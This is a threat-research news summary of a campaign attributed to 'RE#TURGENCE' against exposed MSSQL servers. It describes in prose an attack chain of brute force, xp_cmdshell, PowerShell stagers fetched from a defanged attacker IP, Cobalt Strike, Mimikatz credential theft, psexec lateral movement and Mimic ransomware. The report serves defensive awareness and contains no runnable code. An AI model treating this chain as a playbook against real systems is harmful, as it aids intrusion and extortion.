Securonix Threat Research reports that exposed MSSQL database servers are being actively targeted in an attempt to deploy ransomware. The malicious activity has been attributed to a group tracked as "RE#TURGENCE."
Data provided by the Securonix report show the actor leverages Turkish and English languages.
The attacks appear to be opportunistic in nature, as the actor seems to be looking for MSSQL DB instances that can be subjected to brute force attacks for initial intrusion. MSSQL are very widely used making this threat quite significant for numerous organizations globally.
There is reportedly a loose geographical focus; the majority of the targeting occurred against instances in the United States, the European Union, and Latin America. At the same time, such a geographically dispersed victimology may result from an opportunistic approach rather than a targeted one. Commands are run via xp_cmdshell, which should be disabled by default.
If the initial intrusion is successful, the actor executes Powershell to run an encoded command that connects to an attacker-controlled server (88.214.26[.]3) to download a Powershell script named '189Jt.' The latter is responsible for downloading a second stager, a separate Powershell script ('MSjku'), which, in turn, contains a heavily obfuscated Cobalt Strike payload. The latter is injected into the Windows process SndVol.exe, which controls the volume settings for the system.
Via Cobalt Strike, the attackers also downloaded and installed a copy of AnyDesk to maintain persistent access to the compromised machine and install other tools such as Mimikatz to steal credentials. This way, the actor was able to obtain a domain admin password as well.
Further reconnaissance of the compromised network was carried out via Advanced Port Scanner, another utility downloaded via AnyDesk.
Lateral movement was performed by abusing the domain admin password the actor had obtained via Mimikatz. At that stage, the actor was able to leverage living-off-the-land techniques and abuse psexec to open a session to a domain controller.
The attack chain culminated with the deployment of the Mimic ransomware.